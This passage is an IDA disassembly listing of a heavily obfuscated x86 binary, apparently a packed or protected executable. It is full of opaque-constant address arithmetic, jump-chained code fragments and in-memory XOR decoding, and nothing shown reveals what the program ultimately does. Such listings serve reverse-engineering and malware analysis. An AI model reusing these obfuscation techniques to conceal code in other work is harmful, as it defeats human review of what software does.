retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42512A
loc_428241: ; CODE XREF: sub_42512A+3277�j
pop esi
and ecx, 0F2211B1Dh
sub ecx, 0E8075E6Ch
add ecx, 72D906D9h
cmp ecx, 53C42F12h
jmp loc_42744B
; END OF FUNCTION CHUNK FOR sub_42512A
; ---------------------------------------------------------------------------
loc_42825F: ; CODE XREF: _7hdaygc1:loc_42F991�j
jz loc_425C6D
jmp loc_42E550
; =============== S U B R O U T I N E =======================================
sub_42826A proc near ; CODE XREF: sub_424CE0+528E�j
; sub_42CC45+1E1B�p
; FUNCTION CHUNK AT 00429697 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042CDE4 SIZE 00000003 BYTES
xchg esi, [esp+0]
pop esi
cmp dword ptr [ebp-0Ch], 0
call sub_42F789
loc_428277: ; CODE XREF: sub_42F436-952B�j
jmp loc_429697
sub_42826A endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_165. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_42827D: ; CODE XREF: sub_42A4F1-4A29�j
; _7hdaygc1:0042A211�j
rol eax, 8
push eax
call sub_42B650
retn
; END OF FUNCTION CHUNK FOR sub_42A4F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_428287: ; CODE XREF: sub_42911B+16D7�j
jmp nullsub_3
; END OF FUNCTION CHUNK FOR sub_42911B
; =============== S U B R O U T I N E =======================================
sub_42828C proc near ; CODE XREF: sub_42AA07:loc_4231F5�j
; sub_425459:loc_42363D�j ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00429C0E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BBD9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E98D SIZE 00000005 BYTES
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
jmp loc_429C0E
sub_42828C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_217. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AD16
loc_428298: ; CODE XREF: sub_42AD16+10B3�j
jmp loc_4299A3
; END OF FUNCTION CHUNK FOR sub_42AD16
; ---------------------------------------------------------------------------
loc_42829D: ; CODE XREF: _7hdaygc1:0042D9C0�j
jnz loc_42F23F
jmp loc_42CC9C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_206. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4282A9 proc near ; CODE XREF: sub_423FA0:loc_42EF1A�j
; FUNCTION CHUNK AT 00423234 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423AA2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00424AFB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428FBD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B54E SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0042D220 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FACE SIZE 0000000E BYTES
add esp, 0FFFFFFF8h
push 80193D74h
pop eax
rol eax, 1Eh
test eax, 1
jmp loc_42D220
sub_4282A9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AA8
loc_4282C0: ; CODE XREF: sub_424AA8+64C6�j
jz loc_42879C
jmp loc_426BDF
; END OF FUNCTION CHUNK FOR sub_424AA8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_4282CB: ; CODE XREF: sub_42B74A+F�j
pop eax
or eax, 66C59FD4h
and eax, 221C0970h
or eax, 0AF07FF34h
xor eax, 0A6DC91FDh
add eax, ebp
add eax, 0F63C9173h
mov eax, [eax]
jmp loc_4246AB
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425D65
loc_4282F3: ; CODE XREF: sub_425D65:loc_42D8BB�j
; sub_42E7F5�j
xor eax, eax
mov [ebp-8], eax
jmp loc_4271D2
; END OF FUNCTION CHUNK FOR sub_425D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_4282FD: ; CODE XREF: sub_423648+5A73�j
test byte ptr [ebp-8], 8
jz loc_42FA7C
push ebp
mov eax, [ebp-20h]
jmp loc_42E52F
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
loc_428310: ; CODE XREF: _7hdaygc1:loc_42C22E�j
jl loc_4259DA
jl loc_42AEC3
jmp loc_4252C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_428321: ; CODE XREF: sub_42D84A:loc_42E418�j
jz loc_42C8B6
jmp loc_42A671
; END OF FUNCTION CHUNK FOR sub_42D84A
; ---------------------------------------------------------------------------
xchg edi, [ecx]
jmp sub_42BDCF
; ---------------------------------------------------------------------------
push eax
ror eax, 15h
loc_428337: ; CODE XREF: _7hdaygc1:loc_425F1B�j
mov ds:dword_42B9AC, eax
jmp locret_42998E
; =============== S U B R O U T I N E =======================================
sub_428342 proc near ; CODE XREF: sub_42E29B�j
; FUNCTION CHUNK AT 0042A9C3 SIZE 00000005 BYTES
push ebp
push offset loc_427047
jmp loc_42A9C3
sub_428342 endp
; ---------------------------------------------------------------------------
loc_42834D: ; CODE XREF: _7hdaygc1:0042B3DC�j
xor eax, 0B7B5DA6h
jnp loc_426797
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_428359: ; CODE XREF: sub_424AE1:loc_42B3CF�j
or ecx, 0AC73A25Ch
add ecx, 2CF15BAh
mov [ecx], eax
push offset loc_42C8E0
jmp loc_429867
; END OF FUNCTION CHUNK FOR sub_424AE1
; =============== S U B R O U T I N E =======================================
sub_428371 proc near ; CODE XREF: sub_427E1C+1�p
; _7hdaygc1:0042E643�j ...
xchg eax, [esp+0]
pop eax
ror eax, 4
mov ds:dword_425158, eax
retn
sub_428371 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42837F proc near ; CODE XREF: sub_42B32F�j
; FUNCTION CHUNK AT 004262D4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00426AE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E9BC SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_42E9BC
sub_42837F endp
; ---------------------------------------------------------------------------
db 4Fh
dword_428388 dd 0 ; sub_4270E6:loc_424593�o
dd 54F79355h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_175. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42512A
loc_428391: ; CODE XREF: sub_42512A:loc_4235A3�j
call sub_428E56
push ecx
push 0E8620525h
xchg esi, [esp+0]
mov ecx, esi
jmp loc_428241
; END OF FUNCTION CHUNK FOR sub_42512A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_4283A6: ; CODE XREF: sub_42C16F:loc_42A0D6�j
jnz loc_427DA5
add ebx, 55AEF167h
shr edx, 0Fh
jmp loc_427DA3
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D30E
loc_4283BA: ; CODE XREF: sub_42D30E:loc_42CA1E�j
or eax, 0F9293688h
and eax, 0C67AD474h
sub eax, 3C2BA3Dh
xor eax, 397B0140h
add eax, ebp
push edi
jmp loc_42EAB0
; END OF FUNCTION CHUNK FOR sub_42D30E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429532
loc_4283DA: ; CODE XREF: sub_429532-2CB6�j
jz loc_4236DB
mov eax, [ebp-4]
cmp byte ptr [eax], 0EBh
jz loc_4236DB
mov eax, [ebp-4]
call sub_425182
; END OF FUNCTION CHUNK FOR sub_429532
; START OF FUNCTION CHUNK FOR sub_423172
loc_4283F4: ; CODE XREF: sub_423172:loc_427450�j
jz loc_424C8D
jmp loc_42CAD7
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_4283FF: ; CODE XREF: sub_42D002:loc_42EF0B�j
call sub_42A4C2
; END OF FUNCTION CHUNK FOR sub_42D002
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_428404: ; CODE XREF: sub_42C16F-5104�j
jmp loc_42DDB5
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_428409: ; CODE XREF: sub_4291EA-5F6A�j
jmp loc_42A0AF
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42840E: ; CODE XREF: sub_423648-11�j
jz loc_4290B7
push ebp
mov eax, [ebp-20h]
call sub_42E254
jmp loc_423BDA
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_428422: ; CODE XREF: sub_425C3B+8ADC�j
xor eax, 159C8805h
add eax, ebp
call sub_423DFC
loc_42842F: ; CODE XREF: sub_42EA6A:loc_42A62B�j
pushf
cmp eax, 0F2C8A678h
jmp loc_429C13
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42581B
loc_42843B: ; CODE XREF: sub_42581B:loc_4262B9�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
setz al
call sub_42A3F7
loc_42844D: ; CODE XREF: sub_42581B:loc_42860E�j
call sub_424680
loc_428452: ; CODE XREF: sub_42CA28+18�j
jmp nullsub_15
; END OF FUNCTION CHUNK FOR sub_42581B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_428458: ; CODE XREF: _7hdaygc1:loc_42D4AB�j
add ebx, edx
xor ebp, 289C24Bh
jmp sub_42AB0F
; ---------------------------------------------------------------------------
loc_428465: ; CODE XREF: _7hdaygc1:00429708�j
mov esi, edi
adc edi, edx
pop ecx
jmp loc_427DF7
; ---------------------------------------------------------------------------
loc_42846F: ; CODE XREF: _7hdaygc1:loc_42907B�j
; DATA XREF: sub_424B63+450E�o
push edx
call sub_428818
; START OF FUNCTION CHUNK FOR sub_42C209
loc_428475: ; CODE XREF: sub_42C209+3B03�j
jmp nullsub_184
; END OF FUNCTION CHUNK FOR sub_42C209
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42847A: ; CODE XREF: sub_42EBD6-1936�j
jmp loc_423464
; END OF FUNCTION CHUNK FOR sub_42EBD6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_192. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_428480: ; CODE XREF: sub_423DDB+B424�j
jmp loc_426654
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
loc_428485: ; CODE XREF: _7hdaygc1:0042502D�j
shr eax, 5
xor [ebp-4], eax
inc dword ptr [ebp-8]
push offset loc_42C0EE
jmp locret_42546C
; =============== S U B R O U T I N E =======================================
sub_428498 proc near ; CODE XREF: _7hdaygc1:0042B796�p
; _7hdaygc1:0042EEEC�j
var_1C = dword ptr -1Ch
; FUNCTION CHUNK AT 00426C40 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429FE0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042A28D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042BA3B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042BD62 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CF41 SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
xor edi, 2E187723h
add edi, ebp
add edi, 35D2A8ACh
mov edi, [edi]
cmp eax, edi
pop edi
jmp loc_42CF41
sub_428498 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4284B4: ; CODE XREF: _7hdaygc1:0042B2E7�j
cmp ebx, esi
jmp loc_42F7E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42450E
loc_4284BB: ; CODE XREF: sub_42450E+1BFC�j
jp loc_425EBF
add ebx, eax
jmp loc_4250B8
; END OF FUNCTION CHUNK FOR sub_42450E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42653E
loc_4284C8: ; CODE XREF: sub_42653E+6�j
add eax, [ebp-4]
call sub_42E347
; END OF FUNCTION CHUNK FOR sub_42653E
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_4284D0: ; CODE XREF: sub_4237DA:loc_42D815�j
pop esi
add esi, 0F321BF28h
jnz loc_42DB94
loc_4284DD: ; CODE XREF: _7hdaygc1:00426F32�j
jmp nullsub_63
; END OF FUNCTION CHUNK FOR sub_4237DA
; ---------------------------------------------------------------------------
xor ecx, 8E9A2765h
jno loc_429949
jmp loc_42DB91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED4E
loc_4284F3: ; CODE XREF: sub_42ED4E-7F5E�j
xor [esi], edx
push 30A6C5C8h
pop eax
xor eax, 40A4E292h
add eax, 0FFDD8AAh
jmp loc_42B22F
; END OF FUNCTION CHUNK FOR sub_42ED4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42850C: ; CODE XREF: sub_42C16F-76EF�j
push 9001F8B3h
pop eax
sub eax, 9DE5F076h
and eax, 7179FFF2h
jmp loc_428174
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
adc edi, ebx
jmp sub_4254BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C1F
loc_42852A: ; CODE XREF: sub_429C1F:loc_42A177�j
mov esi, edi
xchg esi, [esp+4+var_4]
push ebx
loc_428530: ; CODE XREF: _7hdaygc1:004256F4�j
; sub_426CBB+7A26�j
push esi
mov esi, ecx
xchg esi, [esp+0Ch+var_C]
jmp loc_42D54F
; END OF FUNCTION CHUNK FOR sub_429C1F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9E1
loc_42853B: ; CODE XREF: sub_42B9E1:loc_42F5A7�j
mov eax, [ebx]
neg eax
cmp ax, 0A5B3h
jnz loc_42B9EA
retn
; END OF FUNCTION CHUNK FOR sub_42B9E1
; ---------------------------------------------------------------------------
loc_42854A: ; CODE XREF: _7hdaygc1:0042A329�j
jmp loc_426CF8
; ---------------------------------------------------------------------------
xor edi, eax
jmp sub_42AE0B
; =============== S U B R O U T I N E =======================================
sub_428556 proc near ; CODE XREF: sub_42EBD6-B92C�p
; _7hdaygc1:0042B92C�j
xchg edx, [esp+0]
pop edx
xor [esi], edx
mov eax, 80000000h
push offset loc_427137
jmp nullsub_156
sub_428556 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_187. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E7E
loc_42856C: ; CODE XREF: sub_424E7E+712A�j
jmp loc_4295B9
; END OF FUNCTION CHUNK FOR sub_424E7E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_428571: ; CODE XREF: sub_423172+7E35�j
jmp loc_4265A0
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_428576: ; CODE XREF: sub_425A37+AB2�j
jmp loc_426031
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42857B: ; CODE XREF: sub_42F65A-AD59�j
jmp nullsub_129
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE8A
loc_428580: ; CODE XREF: sub_42EE8A-837D�j
xor ecx, 41F5D113h
add eax, ecx
pop ecx
call sub_4287D8
; END OF FUNCTION CHUNK FOR sub_42EE8A
; START OF FUNCTION CHUNK FOR sub_424B63
loc_42858E: ; CODE XREF: sub_424B63+1B5A�j
jmp loc_42EADC
; END OF FUNCTION CHUNK FOR sub_424B63
; =============== S U B R O U T I N E =======================================
sub_428593 proc near ; DATA XREF: sub_424AE1-157C�o
add eax, 0A1F1104Eh
popf
push eax
sub_428593 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42859B: ; CODE XREF: sub_424AE1+1B9A�j
push 0BC7F8888h
pop eax
or eax, 5CA67D96h
jmp loc_42BB9A
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
loc_4285AC: ; CODE XREF: _7hdaygc1:004254B9�j
cmp edx, edi
jmp loc_42BE3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB61
loc_4285B3: ; CODE XREF: sub_42BB61+8�j
and edx, 8DC63D52h
add edx, 6F5263C5h
xor edx, 7BFAF05Ch
add edx, 6B9A0D80h
popf
jmp loc_42F996
; END OF FUNCTION CHUNK FOR sub_42BB61
; ---------------------------------------------------------------------------
loc_4285D1: ; CODE XREF: _7hdaygc1:0042D268�j
push offset sub_429BD4
loc_4285D6: ; CODE XREF: _7hdaygc1:loc_42F7E0�j
jmp locret_4238DC
; ---------------------------------------------------------------------------
jbe loc_429BCF
jmp sub_42B462
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_4285E6: ; CODE XREF: sub_42FD11-10C0�j
and eax, 2A63D726h
sub eax, 0BDCDF293h
rol eax, 15h
xor eax, 70E7A48Ch
add eax, ebp
add eax, 1350902h
jmp loc_425E5F
; END OF FUNCTION CHUNK FOR sub_42FD11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_113. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BF7
loc_428609: ; CODE XREF: sub_426BF7+A�j
jmp loc_42731D
; END OF FUNCTION CHUNK FOR sub_426BF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42581B
loc_42860E: ; CODE XREF: sub_42581B-1002�j
jmp loc_42844D
; END OF FUNCTION CHUNK FOR sub_42581B
; =============== S U B R O U T I N E =======================================
sub_428613 proc near ; CODE XREF: sub_42B907-2557�p
; _7hdaygc1:0042DD8B�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423864 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00427F4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C12E SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042D1E2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042FBBB SIZE 00000006 BYTES
xchg eax, [esp-4+arg_0]
pop eax
push ebx
pushf
jmp loc_42C12E
sub_428613 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42861E: ; CODE XREF: _7hdaygc1:00423C20�j
not edi
loc_428620: ; CODE XREF: _7hdaygc1:loc_42F5F8�j
push edi
push 0E99BA0FCh
pop edi
jmp loc_428EE6
; =============== S U B R O U T I N E =======================================
sub_42862C proc near ; CODE XREF: _7hdaygc1:004273B3�j
; sub_424CE0:loc_429F63�p
xchg edx, [esp+0]
pop edx
mov ds:dword_42E544, eax
retn
sub_42862C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_428637: ; CODE XREF: sub_4232C2+19C4�j
jmp loc_42E25A
; END OF FUNCTION CHUNK FOR sub_4232C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42863C: ; CODE XREF: sub_4291EA-272A�j
; _7hdaygc1:0042D70E�j
rol eax, 12h
jmp loc_42B931
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
test ebp, 668F5D58h
jmp loc_426B91
; ---------------------------------------------------------------------------
call nullsub_208
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jz loc_42327A
jmp loc_427CDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF30
loc_42866D: ; CODE XREF: sub_42EF30:loc_42F482�j
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp-8], eax
add edx, ebx
rol edx, 5
jmp loc_42AFD2
; END OF FUNCTION CHUNK FOR sub_42EF30
; ---------------------------------------------------------------------------
rol ecx, 1Fh
not ebp
loc_428684: ; CODE XREF: _7hdaygc1:loc_42B5D0�j
jmp sub_42B057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E51C
loc_428689: ; CODE XREF: sub_42E51C:loc_42E52F�j
call sub_428697
pop ecx
loc_42868F: ; CODE XREF: _7hdaygc1:loc_428727�j
mov [ebp-20h], eax
jmp loc_42FA7C
; END OF FUNCTION CHUNK FOR sub_42E51C
; =============== S U B R O U T I N E =======================================
sub_428697 proc near ; CODE XREF: sub_42E51C:loc_428689�p
call sub_42D9F8
locret_42869C: ; CODE XREF: sub_425752+7EE0�j
retn
sub_428697 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42869D: ; CODE XREF: sub_42EBD6+101C�j
jmp loc_4268AF
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
loc_4286A2: ; DATA XREF: sub_42EF30-3F4F�o
js loc_42A69E
call sub_42F8C4
; START OF FUNCTION CHUNK FOR sub_4246D7
loc_4286AD: ; CODE XREF: sub_4246D7+877E�j
jmp loc_426625
; END OF FUNCTION CHUNK FOR sub_4246D7
; ---------------------------------------------------------------------------
rol edx, 0Eh
mov edi, 3BF5CFDEh
jmp sub_426303
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426315
loc_4286BF: ; CODE XREF: sub_426315+E61�j
xchg ebx, [esp+4+var_4]
push offset loc_42DA15
jmp nullsub_191
; END OF FUNCTION CHUNK FOR sub_426315
; ---------------------------------------------------------------------------
rol ebp, 4
jmp loc_427F84
; ---------------------------------------------------------------------------
loc_4286D4: ; DATA XREF: sub_42F0D1+E�o
jmp loc_421AA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_4286D9: ; CODE XREF: sub_426130+9057�j
jmp loc_42A427
; END OF FUNCTION CHUNK FOR sub_426130
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xor byte ptr [ebx+4Dh], 0
add [edx-75h], dl
rol dword ptr [edi-2274DBECh], cl
xchg ebx, [esp]
jmp loc_425032
; ---------------------------------------------------------------------------
loc_4286F4: ; DATA XREF: sub_42AA07-38B4�o
push edx
push 9FFC2CD8h
pop edx
rol edx, 0Bh
xor edx, 0A2297D12h
add edx, ebp
push eax
push 8B940747h
jmp loc_423933
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_428711: ; CODE XREF: sub_42A2EF-E16�j
push 2BB15506h
pop esi
or esi, 0CA5FBABh
add esi, 0D08CE215h
mov [esi], eax
pop esi
locret_428726: ; CODE XREF: sub_42FC2D+A�j
retn
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
loc_428727: ; CODE XREF: _7hdaygc1:0042CBE4�j
jb loc_42868F
adc ebp, esi
; START OF FUNCTION CHUNK FOR sub_423B20
loc_42872F: ; CODE XREF: sub_423B20:loc_42CBD1�j
add eax, 486CF835h
rol eax, 0Eh
add eax, 18477844h
mov eax, [eax]
call sub_42A17C
; END OF FUNCTION CHUNK FOR sub_423B20
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_428745: ; CODE XREF: sub_4291A3-1276�j
jmp loc_429511
; END OF FUNCTION CHUNK FOR sub_4291A3
; =============== S U B R O U T I N E =======================================
sub_42874A proc near ; DATA XREF: _7hdaygc1:0042D098�o
; FUNCTION CHUNK AT 004236A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004249D3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042676E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426DC8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429622 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042C3B3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042D338 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042E3B6 SIZE 0000001A BYTES
mov ebx, eax
call sub_428C3B
xor ebx, eax
push esi
push 0FCDDB25Fh
jmp loc_42E3B6
sub_42874A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42875E: ; CODE XREF: sub_42EBD6:loc_424A52�j
and eax, 2FFFh
add [esi], eax
call sub_429EBB
; END OF FUNCTION CHUNK FOR sub_42EBD6
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42876A: ; CODE XREF: sub_42C443+33DB�j
jmp loc_42CFA9
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42876F: ; CODE XREF: sub_424F62:loc_42AEC9�j
add eax, 424B6DAEh
push offset loc_426CE9
jmp loc_428FB8
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291CE
loc_42877F: ; CODE XREF: sub_4291CE:loc_427446�j
mov ebp, esp
add esp, 0FFFFFFE0h
push ebp
mov ebp, ebx
xchg ebp, [esp+0]
push 39F0543Bh
loc_42878F: ; CODE XREF: _7hdaygc1:00423992�j
jmp loc_425A9A
; END OF FUNCTION CHUNK FOR sub_4291CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AA8
loc_428794: ; CODE XREF: sub_424AA8+213A�j
sbb esi, edi
sub ecx, 0A1875C0Ch
loc_42879C: ; CODE XREF: sub_424AA8:loc_4282C0�j
call sub_429999
; END OF FUNCTION CHUNK FOR sub_424AA8
; START OF FUNCTION CHUNK FOR sub_42C443
loc_4287A1: ; CODE XREF: sub_42C443:loc_42454B�j
push 0C64E0733h
jmp loc_42340B
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
loc_4287AB: ; CODE XREF: _7hdaygc1:0042F3AC�j
push 8085C769h
pop ebx
and ebx, 0D37180BFh
sub ebx, 7A4F87E0h
jmp loc_42C5DA
; ---------------------------------------------------------------------------
loc_4287C2: ; DATA XREF: sub_42AA47:loc_42C439�o
div dword ptr [ebp-8]
mov [ebp-0Ch], edx
; START OF FUNCTION CHUNK FOR sub_42DE6F
loc_4287C8: ; CODE XREF: sub_42450E:loc_42D2DD�j
; sub_42DE6F+D�j
mov eax, [ebp-0Ch]
mov esp, ebp
xchg edx, [esp+0]
mov ebp, edx
pop edx
jmp loc_429C35
; END OF FUNCTION CHUNK FOR sub_42DE6F
; =============== S U B R O U T I N E =======================================
sub_4287D8 proc near ; CODE XREF: _7hdaygc1:00425799�j
; sub_42EE8A-6901�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004271CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428F11 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042AD2B SIZE 0000000E BYTES
xchg eax, [esp+0]
pop eax
mov eax, [eax]
push eax
jmp loc_428F11
sub_4287D8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_4287E4: ; CODE XREF: sub_426130:loc_42DF67�j
call sub_428E56
call sub_423F02
test al, al
jmp loc_425D7A
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
loc_4287F5: ; CODE XREF: _7hdaygc1:00425DD4�j
jg loc_42CD50
jmp loc_42505B
; ---------------------------------------------------------------------------
loc_428800: ; CODE XREF: _7hdaygc1:0042C30B�j
not esi
; =============== S U B R O U T I N E =======================================
sub_428802 proc near ; CODE XREF: sub_42A1B6-47EE�p
; FUNCTION CHUNK AT 00423D30 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042C229 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add edi, ebp
jmp loc_42C229
sub_428802 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B907
loc_42880D: ; CODE XREF: sub_42B907:loc_426489�j
jnz loc_42395F
jmp loc_42B695
; END OF FUNCTION CHUNK FOR sub_42B907
; =============== S U B R O U T I N E =======================================
sub_428818 proc near ; CODE XREF: _7hdaygc1:0042499C�j
; _7hdaygc1:00428470�p
xchg edi, [esp+0]
pop edi
push eax
mov eax, [ebp-8]
cdq
add eax, [esp+0]
loc_428824: ; CODE XREF: _7hdaygc1:00424B58�j
push offset sub_426D30
jmp loc_423A92
sub_428818 endp
; ---------------------------------------------------------------------------
sub ebx, 571039A0h
jmp sub_42AB9F
; ---------------------------------------------------------------------------
locret_428839: ; CODE XREF: _7hdaygc1:0042C24C�j
retn
; ---------------------------------------------------------------------------
loc_42883A: ; CODE XREF: _7hdaygc1:0042BBFD�j
jmp loc_425ECF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42883F: ; CODE XREF: sub_42C16F-36D9�j
jge loc_4266D7
